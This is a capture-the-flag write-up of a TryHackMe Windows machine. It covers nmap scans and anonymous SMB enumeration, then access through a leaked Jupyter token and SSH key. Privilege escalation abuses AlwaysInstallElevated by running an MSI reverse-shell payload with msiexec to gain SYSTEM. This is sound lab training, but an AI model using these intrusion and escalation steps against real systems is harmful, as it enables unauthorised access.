#tryhackme #medium #windows
![[Pasted image 20250713142911.png]]
---
# Information Gathering - Nmap
I started off with scanning all TCP ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:28 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
Not shown: 65377 closed tcp ports (reset), 143 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
8888/tcp open sun-answerbook
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49672/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 23.43 seconds
```
Then I did another TCP scan against the open ports for more detailed information.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,135,139,445,3389,5985,8888,47001,49664,49665,49667-49672
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:33 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
|_ 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Not valid before: 2025-07-12T16:26:49
|_Not valid after: 2026-01-11T16:26:49
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2025-07-13T16:34:50+00:00
|_ssl-date: 2025-07-13T16:34:59+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open http Tornado httpd 6.0.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: TornadoServer/6.0.3
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp closed unknown
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-07-13T16:34:51
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.76 seconds
```
Lastly, a UDP scan was done against top 10 ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:39 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds
```
---
# Enumeration
##### Port139 445 - SMB
I was able to enumerate shares and the share `datasci-team` stood out because it's not a default share.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N -L //$IP
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
datasci-team Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.102.97 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
It contained a few directories and files, it would be very inconvenient for me to download each file one by one, so I'll just download everything to my local Kali and look through them there
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N //$IP/datasci-team
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 25 10:27:02 2022
.. D 0 Thu Aug 25 10:27:02 2022
.ipynb_checkpoints DA 0 Thu Aug 25 10:26:47 2022
Long-Tailed_Weasel_Range_-_CWHR_M157_[ds1940].csv A 146 Thu Aug 25 10:26:46 2022
misc DA 0 Thu Aug 25 10:26:47 2022
MPE63-3_745-757.pdf A 414804 Thu Aug 25 10:26:46 2022
papers DA 0 Thu Aug 25 10:26:47 2022
pics DA 0 Thu Aug 25 10:26:47 2022
requirements.txt A 12 Thu Aug 25 10:26:46 2022
weasel.ipynb A 4308 Thu Aug 25 10:26:46 2022
weasel.txt A 51 Thu Aug 25 10:26:46 2022
15587583 blocks of size 4096. 8949754 blocks available
smb: \>
```
I used the `prompt off` command to prevent the share from asking me whether to download each file. Then, I used `recurse on` to enable recursive downloading of subdirectories, and finally, `mget *` to download everything.
![[Pasted image 20250713114957.png]]
##### HTTP - Port 8888
The page on port 8888 is asking for password or token to log in.
![[Pasted image 20250713115745.png]]
I found a file named `jupyter-token.txt` under `misc` directory which was in the SMB share.
![[Pasted image 20250713120425.png]]
Successfully logged in with the token but everything here is basically what I downloaded from the SMB share.
![[Pasted image 20250713120614.png]]
I felt like there's more going on behind what I see here on Port 8080, so I ran `gobuster` to enumerate directories. It revealed a few directories for me to explore and I visited each.
![[Pasted image 20250713122854.png]]
# Exploitation - Initial Access
Among the directories found, the `/lab` directory is the most interesting because it has a built-in terminal where we can execute commands.
![[Pasted image 20250713124115.png]]
Looking around the system, I found a file named `dev-datasci-lowpriv_id_ed25519`. The `file` command revealed it's an OpenSSH private key.
![[Pasted image 20250713123825.png]]
![[Pasted image 20250713122723.png]]
Using the private key, I was able to log into the remote Windows system as `dev-datasci-lowpriv` user.
![[Pasted image 20250713123926.png]]
![[Pasted image 20250713123910.png]]
Found `user.txt` in `C:\Users\dev-datasci-lowpriv\Desktop`
![[Pasted image 20250713124235.png]]
# Privilege Escalation
I spent a fair amount of time looking around the system for privilege escalation hints but I couldn't find any. I still have a lot of rooms to improve especially when it comes to Windows machines. I transferred `winpeas` from my local Kali to this remote windows machine.
`Winpeas` revealed the password for the current user. Let's take a note of this
![[Pasted image 20250713141708.png]]
`Winpeas` revealed that the system is vulnerable to `AlwaysInstallElevated` exploit.
- This is a Windows vulnerability where the system allows any user to install MSI (Windows Installer) packages with **`SYSTEM privileges`** if certain registry settings are enabled.
- When both the user and machine registry keys for `AlwaysInstallElevated` are set to `1`, a low-privileged user can run malicious MSI files and gain full system control.
As you can see from the screenshot below, the `AlwaysInstallElevated` field of both `HKCU` and `HKLM` are set to `1` indicating that we can exploit this system and gain full system control.
![[Pasted image 20250713140400.png]]
First, we need to generate a reverse shell payload as an `.msi` file in my local Kali.
![[Pasted image 20250713140542.png]]
Transfer the reverse shell payload from the local Kali to the remote Windows system using `certutil`
![[Pasted image 20250713140709.png]]
I ran the following command multiple times but nothing happened. `msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\Desktop\Temp\revshell.msi`
Then I added `runas /u:dev-datasci-lowpriv` in the front, it was executed and asked for the password of the current user.
![[Pasted image 20250713142718.png]]
After it was executed, when visited back to my local Kali, I saw my net cat listener was connected to a reverse shell as `nt authority\system`
![[Pasted image 20250713142734.png]]
Found `root.txt`
![[Pasted image 20250713142814.png]]